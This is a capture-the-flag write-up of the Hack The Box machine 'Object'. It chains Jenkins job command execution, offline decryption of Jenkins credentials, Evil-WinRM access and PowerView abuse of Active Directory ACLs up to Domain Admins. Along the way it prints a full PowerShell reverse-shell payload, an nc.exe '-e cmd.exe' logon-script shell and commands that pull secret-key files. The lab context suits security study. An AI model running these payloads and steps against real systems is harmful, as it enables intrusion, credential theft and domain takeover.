Object

Completed on October 11, 2022

Overview

This machine gave me another opportunity to explore how applications such as Jenkins could be leveraged to compromise the system, the environment, and even a domain. In a nutshell, only the Jenkins documentation was needed along with a bit of research to gain access and PowerView to compromise the environment plus some Active Directory knowledge.

References

Enumeration

Service Enumeration

Just like every scenario, we need to get to know our target better. We do this enumeration by trying to find ports opened on the host and then enumerate each service.

Finding Open Ports:

┌──(kali 👿 kali)-[~/…/Object]
└─$ sudo nmap -e tun0 -Pn -sS -p- --min-rate=1000 --min-parallelism=100 -T5 object.htb -oA Object_OpenPorts
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 09:59 EDT
Nmap scan report for object.htb (10.129.96.147)
Host is up (0.11s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
5985/tcp open  wsman
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 116.46 seconds
                                                                                                                    
┌──(kali 👿 kali)-[~/…/Object]
└─$ sudo nmap -e tun0 -Pn -sS -sC -sV -p 80,5985,8080 --min-rate=1000 --min-parallelism=100 -T5 object.htb -oA Object_PortScan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 10:02 EDT
Nmap scan report for object.htb (10.129.96.147)
Host is up (0.12s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
|_http-title: Mega Engines
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open  http    Jetty 9.4.43.v20210629
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.43.v20210629)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds
[1]    519316 segmentation fault  sudo nmap -e tun0 -Pn -sS -sC -sV -p 80,5985,8080 --min-rate=1000  -T5  -oA

HTTP (TCP 80) Enumeration:

While evaluating what's hosted on TCP 80, we find an email address (ideas@object.htb) which might have the domain used.

It also contains a hyperlink to the application hosted on TCP 8080; Jenkins.

HTTP (TCP 8080) Enumeration:

Registration page is enabled. So we go ahead and create our tester:test123 account.

In the users configuration page, we can create an API key: 192141ae5ce890dd441ab1338a0fe5e8f

This is required to basically trigger the jobs remotely.

As we dont have anything else here, we can create project but not build them:

“Use the following URL to trigger build remotely: JENKINS_URL/job/Testing/build?token=TOKEN_NAME or /buildWithParameters?token=TOKEN_NAME”

As our build steps to trigger, we will use 'whoami /all' for testing purposes:

To trigger the job, we used curl with the given URL sample:

┌──(kali 👿 kali)-[~/…/Object]
└─$ curl -vLkX GET --url 'http://object.htb:8080/job/Testing/build?token=tester' --user 'tester:1192141ae5ce890dd441ab1338a0fe5e8f'
Note: Unnecessary use of -X or --request, GET is already inferred.
*   Trying 10.129.96.147:8080...
* Connected to object.htb (10.129.96.147) port 8080 (#0)
* Server auth using Basic with user 'tester'
> GET /job/Testing/build?token=tester HTTP/1.1
> Host: object.htb:8080
> Authorization: Basic dGVzdGVyOjExOTIxNDFhZTVjZTg5MGRkNDQxYWIxMzM4YTBmZTVlOGY=
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Date: Mon, 10 Oct 2022 15:43:14 GMT
< X-Content-Type-Options: nosniff
< Location: http://object.htb:8080/queue/item/1/
< Content-Length: 0
< Server: Jetty(9.4.43.v20210629)
< 
* Connection #0 to host object.htb left intact

Successful Trigger:

And its output:

Gaining Access

Given this finding where we can execute commands, we attempt to gain access by executing a PS reverse shell.

Payload: powershell.exe -NoP -NonI -W Hidden -sta -ep bypass -Command ‘Set-ExecutionPolicy Bypass -Scope CurrentUser;$client = New-Object System.Net.Sockets.TCPClient("10.10.14.117",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()’

But no luck:

We tried to get creative like using powershell to pull a PS script with the same PS reverse shell payload but we only got a 'unable to connect to the remote server’ error. So at this point, we need to do some research.

Seems like Jenkins stores encrypted credentials locally and with NO admin access in the location set in the $JENKINS_HOME variable (typically the variable in a linux host). In this case, it would be in 'C:\Users\oliver\AppData\Local\Jenkins' as the error above gave us the path.

According to the Codurance publication, we need the following files:

$JENKINS_HOME/credentials.xml: This files holds the encrypted credentials
$JENKINS_HOME/secrets/master.key: This file decrypts hudson.util.Secret
$JENKINS_HOME/secrets/hudson.util.Secret: This file decrypts credentials.xml entries and it is itself encrypted.

Through some job iterations we find that this directory has two directories that belong to the admin user and 'tester'. What we find is that instead of a credentials.xml file (I was expecting a file with this name), we find a config.xml file that contains the encrypted credentials as shown below:

<?xml version='1.1' encoding='UTF-8'?>
<user>
  <version>10</version>
  <id>admin</id>
  <fullName>admin</fullName>
  <properties>
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.6.1">
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
        <entry>
          <com.cloudbees.plugins.credentials.domains.Domain>
            <specifications/>
          </com.cloudbees.plugins.credentials.domains.Domain>
          <java.util.concurrent.CopyOnWriteArrayList>
            <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
              <id>320a60b9-1e5c-4399-8afe-44466c9cde9e</id>
              <description></description>
              <username>oliver</username>
              <password>{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}</password>
              <usernameSecret>false</usernameSecret>
            </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          </java.util.concurrent.CopyOnWriteArrayList>
        </entry>
      </domainCredentialsMap>
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.84">
      <triggers/>
    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
    <hudson.model.MyViewsProperty>
      <views>
        <hudson.model.AllView>
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>
          <name>all</name>
          <filterExecutors>false</filterExecutors>
          <filterQueue>false</filterQueue>
          <properties class="hudson.model.View$PropertyList"/>
        </hudson.model.AllView>
      </views>
    </hudson.model.MyViewsProperty>
    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.3.5">
      <providerId>default</providerId>
    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
    <hudson.model.PaneStatusProperties>
      <collapsed/>
    </hudson.model.PaneStatusProperties>
    <jenkins.security.seed.UserSeedProperty>
      <seed>ea75b5bd80e4763e</seed>
    </jenkins.security.seed.UserSeedProperty>
    <hudson.search.UserSearchProperty>
      <insensitiveSearch>true</insensitiveSearch>
    </hudson.search.UserSearchProperty>
    <hudson.model.TimeZoneProperty/>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoW</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.34">
      <emailAddress>admin@object.local</emailAddress>
    </hudson.tasks.Mailer_-UserProperty>
    <jenkins.security.ApiTokenProperty>
      <tokenStore>
        <tokenList/>
      </tokenStore>
    </jenkins.security.ApiTokenProperty>
    <jenkins.security.LastGrantedAuthoritiesProperty>
      <roles>
        <string>authenticated</string>
      </roles>
      <timestamp>1634793332195</timestamp>
    </jenkins.security.LastGrantedAuthoritiesProperty>
  </properties>
</user>

Next, we need to find the other two files, and we use the following two commands:

type c:\Users\oliver\Appdata\local\jenkins.jenkins\secrets\master.key
powershell.exe -c "$c=[convert]::ToBase64String((Get-Content -path 'c:\Users\oliver\Appdata\local\jenkins.jenkins\secrets\hudson.util.Secret' -Encoding byte));Write-Output $c"

And the output of the job was:

Started by remote host 10.10.14.117
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\Testing
[Testing] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins11888946817563117290.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\Testing>cmd.exe /c "type c:\Users\oliver\Appdata\local\jenkins\.jenkins\secrets\master.key" 
f673fdb0c4fcc339070435bdbe1a039d83a597bf21eafbb7f9b35b50fce006e564cff456553ed73cb1fa568b68b310addc576f1637a7fe73414a4c6ff10b4e23adc538e9b369a0c6de8fc299dfa2a3904ec73a24aa48550b276be51f9165679595b2cac03cc2044f3c702d677169e2f4d3bd96d8321a2e19e2bf0c76fe31db19
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\Testing>powershell.exe -c "$c=[convert]::ToBase64String((Get-Content -path 'c:\Users\oliver\Appdata\local\jenkins\.jenkins\secrets\hudson.util.Secret' -Encoding byte));Write-Output $c" 
gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\Testing>exit 0 
Finished: SUCCESS

Once we retrieve these files, we must convert the data from hudson.util.Secret back to bytes:

┌──(kali 👿 kali)-[~/…/Object]
└─$ echo 'gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=' | base64 -d -w 0 > hudson.util.Secret

With these files, the jenkins_offline_decryptor.py tool will help decrypting the credentials, giving us access to the host:

┌──(kali 👿 kali)-[~/…/Object]
└─$ /opt/pwn_jenkins/offline_decryption/jenkins_offline_decrypt.py master.key hudson.util.Secret credentials.xml
c1cdfun_d2434

Now we have the credentials for oliver:c1cdfun_d2434 and we can attempt to access the system through WinRM:

┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'oliver' -p 'c1cdfun_d2434'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\oliver\Documents> whoami
object\oliver

*Evil-WinRM* PS C:\Users\oliver\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


    Directory: C:\Users\oliver\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/10/2022   6:56 AM             34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::13f
   IPv6 Address. . . . . . . . . . . : dead:beef::f8b8:c26c:96a:3a91
   Link-local IPv6 Address . . . . . : fe80::f8b8:c26c:96a:3a91%12
   IPv4 Address. . . . . . . . . . . : 10.129.96.147
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%12
                                       10.129.0.1
*Evil-WinRM* PS C:\Users\oliver\Desktop> type user.txt
1969db********************1e934b

Privilege Escalation

Local Enumeration

After finding the flag, we need to retrieve more information from the domain, so we proceed to get users, and local and domain groups:

*Evil-WinRM* PS C:\Users\oliver\Desktop> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
maria                    oliver
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\oliver\Desktop> net user maria
User name                    maria
Full Name                    maria garcia
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/21/2021 9:16:32 PM
Password expires             Never
Password changeable          10/22/2021 9:16:32 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/10/2022 6:56:45 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\oliver\Desktop> net user oliver
User name                    oliver
Full Name                    Olivar Ava
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/21/2021 2:23:12 AM
Password expires             Never
Password changeable          10/22/2021 2:23:12 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/10/2022 6:56:48 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\oliver\Desktop> net group /domain

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\oliver\Desktop> net localgroup

Aliases for \\JENKINS

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.

For further enumeration, we used Bloodhound:

*Evil-WinRM* PS C:\Users\oliver\Desktop> upload /opt/BloodHound/Ingestors/SharpHound.ps1
Info: Uploading /opt/BloodHound/Ingestors/SharpHound.ps1 to C:\Users\oliver\Desktop\SharpHound.ps1

                                                             
Data: 1297900 bytes of 1297900 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-ExecutionPolicy Bypass -Scope CurrentUser;Import-Module .\SharpHound.ps1;Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> Invoke-BloodHound -CollectAllProperties -CollectionMethod All
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


    Directory: C:\Users\oliver\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/10/2022  10:36 AM           9139 20221010103651_BloodHound.zip
-a----       10/10/2022  10:36 AM          10043 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a----       10/10/2022  10:35 AM         973425 SharpHound.ps1
-ar---       10/10/2022   6:56 AM             34 user.txt

From the users this domain has, only the domain local Administrator user is a member of the Domain Admins group and not through any other means.

From our enumeration with Bloodhound, we find the user smith which seems to be a protected user that oliver does not have access to see its information. But oliver has the ‘ForceChangePassword’ DACL against smith. This means "The user OLIVER@OBJECT.LOCAL has the capability to change the user SMITH@OBJECT.LOCAL's password without knowing that user's current password."

In turn, maria has ‘WriteOwner’ DACL against the Domain Admins group. This also means "The user MARIA@OBJECT.LOCAL has the ability to modify the owner of the group DOMAIN ADMINS@OBJECT.LOCAL. Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL."

Why all this is important? Well, "The user SMITH@OBJECT.LOCAL has generic write access to the user MARIA@OBJECT.LOCAL. Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user."

Validating the Remote Management Access rights to figure out which users is WinRM accessible to:

*Evil-WinRM* PS C:\Users\oliver\Desktop> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
maria
oliver
smith
The command completed successfully.

Account Modification

Modifying smith's password using PowerView:

*Evil-WinRM* PS C:\Users\oliver\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> $NewPassword = ConvertTo-SecureString 'test123' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity 'smith' -AccountPassword $NewPassword
Warning: [Set-DomainUserPassword] Error setting password for user 'smith' : Exception calling "SetPassword" with "1" argument(s): "The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements. (Exception from HRESULT: 0x800708C5)"
*Evil-WinRM* PS C:\Users\oliver\Desktop> $NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity 'smith' -AccountPassword $NewPassword

Testing modification:

┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'smith' -p 'Password123!'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\smith\Documents> whoami /all

USER INFORMATION
----------------

User Name    SID
============ ==============================================
object\smith S-1-5-21-4088429403-1159899800-2753317549-1104


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

*Evil-WinRM* PS C:\Users\smith\Documents>

Now that we have access as smith, we will use netcat through a batch script to get a reverse shell as maria.

Custom batch script:

@echo off                                                
start /b C:\Windows\Temp\nc.exe 127.0.0.1 1337 -e cmd.exe                                                           
start /b "" cmd /c del "%~f0"&exit /b

In powershell, we will use PowerView to modify the account to execute this script:

*Evil-WinRM* PS C:\Users\smith\Documents> Import-Module .\PowerView.ps1

*Evil-WinRM* PS C:\Users\smith\Documents> Set-DomainObject -Identity  maria -Set @{'scriptpath'='C:\Windows\Temp\shell.bat'}

As soon as we get a reverse shell thanks to this script, we can access all the files in maria's home directory, which contains an Excel spreadsheet with a list of passwords:

Testing maria's passwords and access:

To test these passwords, we will use crackmapexec:

┌──(kali 👿 kali)-[~/…/Object]
└─$ crackmapexec winrm object.htb -d object.local -u maria -p marias_passwd 2> /dev/null
HTTP        object.htb      5985   object.htb       [*] http://object.htb:5985/wsman
WINRM       object.htb      5985   object.htb       [-] object.local\maria:d34gb8@
WINRM       object.htb      5985   object.htb       [-] object.local\maria:0de_434_d545
WINRM       object.htb      5985   object.htb       [+] object.local\maria:W3llcr4ft3d_4cls (Pwn3d!)

Using Evil-WinRM to test:

*Evil-WinRM* PS C:\Users\maria\Documents> whoami /all

USER INFORMATION
----------------

User Name    SID
============ ==============================================
object\maria S-1-5-21-4088429403-1159899800-2753317549-1106


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.


*Evil-WinRM* PS C:\Users\maria\Documents> upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
Info: Uploading /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 to C:\Users\maria\Documents\PowerView.ps1

                                                             
Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\maria\Documents>

This does not say much of value but we already know maria can modify the group ownership of the Domain Admins group (dangerous!!).

Modifying Group Ownership

First, as we want to confirm this again, we will try and find any 'interesting DACLs':

*Evil-WinRM* PS C:\Users\maria\Documents> Set-ExecutionPolicy Bypass -Scope CurrentUser
*Evil-WinRM* PS C:\Users\maria\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\maria\Documents> Find-InterestingDomainAcl | ? {$_.ObjectDN -eq "CN=Domain Admins,CN=Users,DC=object,DC=local" -and $_.IdentityReferenceName -eq "maria"}


ObjectDN                : CN=Domain Admins,CN=Users,DC=object,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : WriteOwner
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-4088429403-1159899800-2753317549-1106
IdentityReferenceName   : maria
IdentityReferenceDomain : object.local
IdentityReferenceDN     : CN=maria garcia,CN=Users,DC=object,DC=local
IdentityReferenceClass  : user

Again with PowerView, we will change the ownership to maria to allow us to make add new ACLs:

*Evil-WinRM* PS C:\Users\maria\Documents> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria' -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=object,DC=local
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=maria)(name=maria)(displayname=maria))))
Verbose: [Get-DomainSearcher] search base: LDAP://DC=object,DC=local
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain Admins))))
Verbose: [Set-DomainObjectOwner] Attempting to set the owner for 'Domain Admins' to 'maria'

Now that maria is the owner, we can add a new ACL to gain full control of the group and add this account as a member of the 'Domain Admins' group, giving us Domain Administrator access:

*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainGroupMember -Identity 'Domain Admins' -Members maria
*Evil-WinRM* PS C:\Users\maria\Documents> net group "Domain Admins" /domain
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            maria
The command completed successfully.

For this new access to take effect, we need to create a new session so we will access the system as maria once more and validate:

┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'maria' -p 'W3llcr4ft3d_4cls'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\maria\Documents> whoami /all

USER INFORMATION
----------------

User Name    SID
============ ==============================================
object\maria S-1-5-21-4088429403-1159899800-2753317549-1106


GROUP INFORMATION
-----------------

Group Name                                    Type             SID                                           Attributes
============================================= ================ ============================================= ===============================================================
Everyone                                      Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users               Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                 Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                        Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                          Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users              Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins                          Group            S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias            S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication              Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level          Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\maria\Documents> Get-ChildItem -Path C:\Users\Administrator\ -Recurse


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        8/24/2021   7:51 AM                3D Objects
d-r---        8/24/2021   7:51 AM                Contacts
d-r---       12/16/2021   9:11 AM                Desktop
d-r---       10/25/2021   8:40 PM                Documents
d-r---       10/22/2021   3:33 AM                Downloads
d-r---        8/24/2021   7:51 AM                Favorites
d-r---        8/24/2021   7:51 AM                Links
d-r---        8/24/2021   7:51 AM                Music
d-r---        8/24/2021   7:51 AM                Pictures
